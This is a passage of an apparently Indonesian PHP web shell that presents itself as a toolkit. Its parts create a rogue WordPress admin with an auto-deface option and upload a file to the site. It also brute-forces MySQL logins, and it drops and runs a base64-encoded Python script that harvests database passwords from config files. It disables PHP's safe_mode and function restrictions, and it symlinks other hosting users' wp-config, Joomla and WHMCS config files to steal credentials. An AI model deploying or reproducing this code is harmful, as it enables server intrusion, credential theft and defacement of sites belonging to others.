3305curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
3306curl_setopt ($ch, CURLOPT_POST, 1);
3307curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
3308curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
3309curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
3310$data3 = curl_exec ($ch);
3311
3312$namafile = "wew.php";
3313$fp2 = fopen($namafile,"w");
3314fputs($fp2,$nick);
3315
3316$y = date("Y");
3317$m = date("m");
3318
3319
3320$ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
3321curl_setopt($ch6, CURLOPT_POST, true);
3322curl_setopt($ch6, CURLOPT_POSTFIELDS,
3323array('file3'=>"@$namafile"));
3324curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3325curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
3326$postResult = curl_exec($ch6);
3327curl_close($ch6);
3328
3329$as = "$target/k.php";
3330$bs = file_get_contents($as);
3331 if(preg_match("#hacked#si",$bs)){
3332 echo "# <font color='green'>berhasil mepes...</font><br>";
3333 echo "# $target/k.php<br>";
3334 }
3335 else{
3336 echo "# <font color='red'>gagal mepes...</font><br>";
3337 echo "# coba aja manual: <br>";
3338 echo "# $target/wp-login.php<br>";
3339 echo "# username: $user_baru<br>";
3340 echo "# password: $password_baru<br>";
3341
3342
3343 }
3344
3345
3346
3347
3348 }
3349
3350 elseif($tanya=="n"){
3351 echo "# Sukses<br>";
3352 echo "# username: $user_baru<br>";
3353 echo "# password: $password_baru<br>";
3354 }
3355
3356
3357
3358 }else{
3359 echo '<html>
3360 <head>
3361 <title>Wordpress Created New User</title>
3362 </head>
3363
3364 <body>
3365 <center>
3366 <center><div id="button"></div>
3367 <h2>Wordpress Created New User</h2>
3368 <table>
3369 <tr><td><form method="post" action="?action"></td></tr>
3370 <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
3371 <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
3372 <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
3373 <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
3374 <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
3375 <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
3376 <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
3377 <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
3378
3379 <tr><td><input type="text" name="nick" placeholder="Hacked By Tu5b0l3d"></td></tr>
3380 <tr><td><input type="submit" value="Ganti"></td></tr>
3381 </table>
3382 *nb: kalo milih y ... silahkan Ganti Form Hacked By Tu5b0l3d jadi Hacked by Nick_ente
3383 </center>
3384 </body>';
3385 }
3386
3387}
3388
3389elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
3390 {
3391 ?>
3392 <form action="?path=<?php echo $path; ?>&x=brute" method="post">
3393<?php
3394
3395@set_time_limit(0);
3396@error_reporting(0);
3397
3398
3399if($_POST['page']=='find')
3400{
3401if(isset($_POST['usernames']) && isset($_POST['passwords']))
3402{
3403 if($_POST['type'] == 'passwd'){
3404 $e = explode("\n",$_POST['usernames']);
3405 foreach($e as $value){
3406 $k = explode(":",$value);
3407 $username .= $k['0']." ";
3408 }
3409 }elseif($_POST['type'] == 'simple'){
3410 $username = str_replace("\n",' ',$_POST['usernames']);
3411 }
3412 $a1 = explode(" ",$username);
3413 $a2 = explode("\n",$_POST['passwords']);
3414 $id2 = count($a2);
3415 $ok = 0;
3416 foreach($a1 as $user )
3417 {
3418 if($user !== '')
3419 {
3420 $user=trim($user);
3421 for($i=0;$i<=$id2;$i++)
3422 {
3423 $pass = trim($a2[$i]);
3424 if(@mysql_connect('localhost',$user,$pass))
3425 {
3426 echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
3427 $ok++;
3428 }
3429 }
3430 }
3431 }
3432 echo "<hr><b>You Found <font color=red>$ok</font> Nice</b>";
3433 echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
3434 exit;
3435}
3436}
3437if($_POST['pass']=='password'){
3438@error_reporting(0);
3439$i = getenv('REMOTE_ADDR');
3440$d = date('D, M jS, Y H:i',time());
3441$h = $_SERVER['HTTP_HOST'];
3442$dir=$_SERVER['PHP_SELF'];
3443mkdir('config',0755);
3444$cp =
3445'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
3446$file = fopen("cp.py","w+");
3447$write = fwrite ($file ,base64_decode($cp));
3448fclose($file);
3449chmod("cp.py",0755);
3450$url = $_POST['url'];
3451echo"<center>
3452<textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
3453system("python cp.py $url config");
3454unlink ('cp.py');
3455echo"</textarea>
3456</center>";
3457echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
3458exit;
3459}
3460if($_POST['matikan']=='sekatan'){
3461@error_reporting(0);
3462$phpini =
3463'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
3464$file = fopen("php.ini","w+");
3465$write = fwrite ($file ,base64_decode($phpini));
3466fclose($file);
3467$htaccess =
3468'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
3469$file = fopen(".htaccess","w+");
3470$write = fwrite ($file ,base64_decode($htaccess));
3471echo "<hr><center><b>DONE!";
3472echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
3473exit;
3474}
3475if($_POST['mendapatkan']=='passwd'){
3476@set_magic_quotes_runtime(0);
3477ob_start();
3478error_reporting(0);
3479@set_time_limit(0);
3480@ini_set('max_execution_time',0);
3481@ini_set('output_buffering',0);
3482$fn = $_POST['foldername'];
3483//all function here
3484
3485function syml($usern,$pdomain)
3486 {
3487 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3488 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3489 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3490 symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3491 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3492 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3493 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3494 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3495 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3496 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3497 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3498 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3499 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3500 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3501 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3502 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3503 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3504 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3505 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3506 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3507 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3508 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3509 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3510 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3511 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3512 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3513 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3514 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3515 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3516 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3517 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3518 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3519 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3520 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3521 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3522 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3523 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3524 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3525 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3526 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3527 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3528 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3529 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3530 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3531 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3532 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3533 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3534 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3535 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3536 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3537 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3538 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3539 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3540 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3541 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3542 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3543 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3544 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3545 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3546 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3547 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3548 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3549 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3550 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3551 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3552 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3553 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3554 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3555 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3556 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3557 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3558 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3559 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3560 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3561 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3562 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3563 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3564 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3565 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3566 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3567 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3568 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3569 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3570 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3571 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3572 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3573 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3574 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3575 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3576 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3577 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3578 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3579 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3580 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3581 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3582 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
